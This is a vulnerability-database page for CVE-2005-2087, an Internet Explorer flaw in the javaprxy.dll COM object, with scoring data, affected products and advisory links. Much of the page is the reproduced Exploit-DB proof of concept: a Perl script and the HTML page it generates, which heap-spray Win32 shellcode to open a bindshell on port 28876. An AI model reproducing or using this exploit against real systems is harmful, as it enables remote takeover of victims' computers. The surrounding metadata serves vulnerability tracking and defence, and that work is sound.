CVE-2005-2087: Detail

CVE-2005-2087

93.11% V3
Network
2005-06-30 02h00 +00:00
2018-10-12 17h57 +00:00

CVE Description

Internet Explorer 5.01 SP4 up to 6 on various Windows operating systems, including IE 6.0.2900.2180 on Windows XP, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, as demonstrated using the JVIEW Profiler (Javaprxy.dll). NOTE: the researcher says that the vendor could not reproduce this problem.

CVE Information

Related Weaknesses

CWE-ID  Weakness name  Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metric  Score  Severity  CVSS Vector  Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore serves to compare the EPSS score of one CVE against other CVEs.

Exploit Information

Exploit Database EDB-ID: 1079

Publication date: 2005-07-04 22h00 +00:00
Author: k-otik
EDB Verified: Yes

<!-- (update) frsirt updated the comments to reflect skylined's code + gpl. /str0ke Perl code is commented so people can test the vuln on their IE /str0ke #!/usr/bin/perl # ###################################################### # # Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched- # # Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com > # Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit # 01 July 2005 # # Description - http://www.frsirt.com/english/advisories/2005/0935 # Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx # sec-consult - http://www.sec-consult.com/184.html # # Solution : # Set Internet and Local intranet security zone settings to "High" or use # another browser until a patch is released. # # Tested on : # Internet Explorer 6 on Microsoft Windows XP SP2 # Internet Explorer 6 on Microsoft Windows XP SP1 # # Affected versions : # Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3 # Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 # Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1 # Internet Explorer 6 for Microsoft Windows XP Service Pack 2 # Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium) # Internet Explorer 6 for Microsoft Windows Server 2003 # Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1 # Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems # Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium # Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) # Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition # Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition # 
Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition # Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE # Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition # # Usage : perl iejavaprxyexploit.pl > mypage.html # ###################################################### # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License version 2, 1991 as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # A copy of the GNU General Public License can be found at: # http://www.gnu.org/licenses/gpl.html # or you can write to: # Free Software Foundation, Inc. # 59 Temple Place - Suite 330 # Boston, MA 02111-1307 # USA. # ###################################################### # header my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n"; # Win32 bindshell (port 28876) - SkyLined my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb". "%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea". "%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7". "%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b". "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64". "%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c". "%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe". "%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0". "%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050". "%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6". "%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650". "%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa". "%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656". 
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1". "%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353". "%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353". "%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe". "%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff". "%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n"; # Memory my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n". "headersize = 20;\n". "slackspace = headersize+shellcode.length\n". "while (bigblock.length<slackspace) bigblock+=bigblock;\n". "fillblock = bigblock.substring(0, slackspace);\n". "block = bigblock.substring(0, bigblock.length-slackspace);\n". "while(block.length+slackspace<0x40000) block = block+block+fillblock;\n". "memory = new Array();\n". "for (i=0;i<750;i++) memory[i] = block + shellcode;\n". "</SCRIPT>\n"; # javaprxy.dll my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # footer my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n". "Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n". "by the FrSIRT < http://www.frsirt.com >\n". "Solution - http://www.frsirt.com/english/advisories/2005/0935". 
"</body><script>location.reload();</script></html>"; # print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin print "$header $shellcode $code $footer"; --> <html><body> <SCRIPT language="javascript"> shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb"); bigblock = unescape("%u0D0D%u0D0D"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<750;i++) memory[i] = block + shellcode; </SCRIPT> <object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object> Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT < http://www.frsirt.com > Solution - http://www.frsirt.com/english/advisories/2005/0935</body><script>location.reload();</script></html> # milw0rm.com [2005-07-05]

Products Mentioned

Configuration 0

Microsoft >> Ie >> Version 5.1
Microsoft >> Ie >> Version 5.2.3
Microsoft >> Ie >> Version 6
Microsoft >> Internet_explorer >> Version 5.1
Microsoft >> Internet_explorer >> Version 5.01
Microsoft >> Internet_explorer >> Version 5.5
Microsoft >> Internet_explorer >> Version 5.5
Microsoft >> Internet_explorer >> Version 5.5
Microsoft >> Internet_explorer >> Version 5.5
Microsoft >> Internet_explorer >> Version 6.0
Microsoft >> Internet_explorer >> Version 6.0.2900.2180

References

http://marc.info/?l=bugtraq&m=112006764714946&w=2
Tags: mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/959049
Tags: third-party-advisory, x_refsource_CERT-VN
http://www.us-cert.gov/cas/techalerts/TA05-193A.html
Tags: third-party-advisory, x_refsource_CERT
http://www.kb.cert.org/vuls/id/939605
Tags: third-party-advisory, x_refsource_CERT-VN
http://securitytracker.com/id?1014329
Tags: vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/14087
Tags: vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/404055
Tags: mailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/15891
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/17680
Tags: vdb-entry, x_refsource_OSVDB
http://www.auscert.org.au/render.html?it=5225
Tags: third-party-advisory, x_refsource_AUSCERT
http://www.vupen.com/english/advisories/2005/0935
Tags: vdb-entry, x_refsource_VUPEN